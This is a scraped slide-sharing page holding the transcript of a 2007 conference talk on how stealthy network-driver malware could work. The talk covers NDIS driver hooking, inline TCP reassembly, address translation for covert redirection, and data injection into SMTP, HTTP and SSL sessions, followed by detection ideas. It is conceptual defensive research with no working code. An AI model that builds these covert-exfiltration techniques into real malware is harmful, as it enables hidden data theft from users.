tcp ip perversion n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
TCP/IP Perversion PowerPoint Presentation
Download Presentation
TCP/IP Perversion

Loading in 2 Seconds...

play fullscreen
1 / 67

TCP/IP Perversion - PowerPoint PPT Presentation


  • 127 Views
  • Uploaded on

TCP/IP Perversion. Rares Stefan, Third Brigade Inc. SecTor 2007. Introduction. Perspective from a researcher focused on protecting hosts from malware Implementing kernel-based protection mechanisms Insight into a potential class of network driver malware. The Rise of Silent Malware.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'TCP/IP Perversion' - phuong


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
tcp ip perversion

TCP/IP Perversion

Rares Stefan, Third Brigade Inc.

SecTor 2007

introduction
Introduction
  • Perspective from a researcher focused on protecting hosts from malware
  • Implementing kernel-based protection mechanisms
    • Insight into a potential class of network driver malware
the rise of silent malware
The Rise of Silent Malware
  • Three main areas of interest in malware R&D:
    • Delivery and activation
    • Hiding presence - rootkit techniques
    • Evasion - Minimize operating noise
      • Show no signs of activity on the infected system
      • Show no traces of network activity on the wire
operational challenges
Operational Challenges
  • Operate on wire data
    • Active at a layer that guarantees transparency to the host
    • Correctly perform inline IP reassembly and TCP stream reassembly
    • Allow for arbitrary injection/removal of data in TCP sessions
operational challenges part deux
Operational Challenges…part deux
  • Maintain silence on the host:
    • Never initiate TCP sessions
    • Never receive TCP open-session requests
    • Do not rely on TCP port splicing if the infected host is a server
    • Do not rely on static motherships if the infected host is a workstation
    • Packet modifications should not be easily visible in local network traces
operational challenges part trois
Operational Challenges…part trois
  • Maintain silence on the wire
    • Only make use of legitimate TCP sessions
    • Do not alter protocol semantics - resistance to network anomaly detection engines
    • Piggyback on encrypted channels (SSL) and multiple TCP sessions for large data transfers
driver implementation pre vista

Never

Access to data stream, not packets

Some interesting areas

No guaranteed access to outbound payload

NDIS hooking

  • Some delivery challenges- Most flexibility - Driver signing issues- Complete control over hardware drivers to transport protocol communications
Driver Implementation Pre-Vista

User Land

TDI

FW hook

PF hook

TCP/IP

NDIS

NDIS.SYS

Intermediate driver

Miniport driver

rogue network driver framework
Rogue Network Driver Framework
  • Firewall hook kernel module for basic packet header operations
  • IM Filter driver:
    • Inline IP reassembly
    • Inline TCP stream reassembly
    • TCP session normalization
infected workstation
Infected Workstation

SNAT/DNAT – SrcIP_Alice -> SrcIP_Bob DstIP_Bob -> dstIP_server

BOB

https://server

ALICE

10.0.1.26

DNAT – DstIP_server -> DstIP_Bob

10.0.1.124

server

Translated request reaches server

infected workstation1
Infected Workstation

SNAT/DNAT – SrcIP_Alice -> SrcIP_Bob DstIP_Bob -> dstIP_server

BOB

https://server

ALICE

10.0.1.26

DNAT – DstIP_server -> DstIP_Bob

10.0.1.124

server

Translated request reaches server

infected server
Infected Server

Selective DN(P)AT:

SrcIP_Alice  SrcIP_server Dst_Port_443  DstPort_135

telnet server:80

ALICE

Server

https request served

https://server

infected server1
Infected Server

Selective DN(P)AT:

SrcIP_Alice  SrcIP_server Dst_Port_443  DstPort_135

telnet server:80

ALICE

Server

https request served

https://server

packet header opportunities
Packet Header Opportunities
  • Passive covert channels
    • http://www.invisiblethings.org/papers/passive-covert-channels-linux.pdf
    • http://www.ouah.org/neural_networks_vs_NUSHU.pdf
    • http://staff.science.uva.nl/~delaat/snb-2005-2006/p27/report.pdf
  • Port splicing
  • Most significant; communicating the original intent:
    • DNAT on outgoing SYN – change destination address to that of the MIM
    • Insert original dstIP in header fields
    • MIM double NAT
why payload injection
Why Payload Injection ?
  • Access to packet data
  • High bandwidth channel
  • Bypass application proxies
  • Altering TCP data length on the wire is not trivial!
inline injection
Inline Injection
  • Support for IP reassembly on incoming traffic and IP fragmentation on outbound traffic
  • Support for TCP stream reassembly – datagram reordering, injection of acknowledgements and resets, among other things
inline tcp reassembly
Inline TCP Reassembly
  • Maintain two edges (pre and post modification):
    • ISN
    • MaxSeq
    • MaxAck
    • Window
    • Maximum SeqNo of Filtered Data
    • Maximum AckNo of Filtered Data
    • Queue/counter for non Ack-ed datagrams
    • Queue/counter for not sent datagrams
    • Needed Window Scale
    • Actual Window Scale
smtp injection eliminating bob from the equation
SMTP Injection – Eliminating Bob from the Equation
  • Reduces the complexity of MIM and random redirection
  • Works with application level proxies
  • Replace RCPT TO argument or inject additional RCPT TO (BCC)
  • Increases the probability detection – SMTP server logs
smtp injection

BOB

Eva

SMTP Injection

Alice

Sends Bob message

Driver injects BCC to Eva

Bob receives original message

SMTP Server

So does Eva

http injection
HTTP Injection
  • TCP Headers useless – need to find workaround
  • Easy workaround but we need to be careful:
    • Transparent proxies (Initial HTTP request looks normal, so we’ll always assume we may be transparently “proxied”)
    • Direct proxies – easy to spot in HTTP(s) requests
  • URI & Headers will help us redirect/leak data
    • Make use of Authorization, Cookies headers – they won’t be scrubbed
    • POST data also presents injection opportunities
http injection1

google.com

BOB

HTTP Injection

Web Proxy – Content Filtering

Change request; Inject Data

http://www.google.com

ALICE

http injection2

google.com

BOB

HTTP Injection

Web Proxy – Content Filtering

Change request; Inject Data

http://www.google.com

ALICE

ssl injection demo

BOB

SSL Injection Demo

somebank.com

Perimeter Security

Inject Data

https://somebank.com

ALICE

ssl injection demo1

BOB

SSL Injection Demo

somebank.com

Perimeter Security

Inject Data

https://somebank.com

ALICE

detecting network driver malware
Detecting Network Driver Malware
  • Conventional detection mechanisms
    • AV, AS signatures; configuration mgmt
  • New detection mechanisms
    • Traffic based detection?
      • Malicious destinations, ISN analysis
      • Network trace diff – local vs. remote
      • NDIS based sniffer for better visibility?
  • Other
    • Host based application control ineffective
    • DLP?
conclusions
Conclusions
  • Passive kernel malware difficult to spot
  • There are significant implementation challenges for coders
  • Prevention remains key approach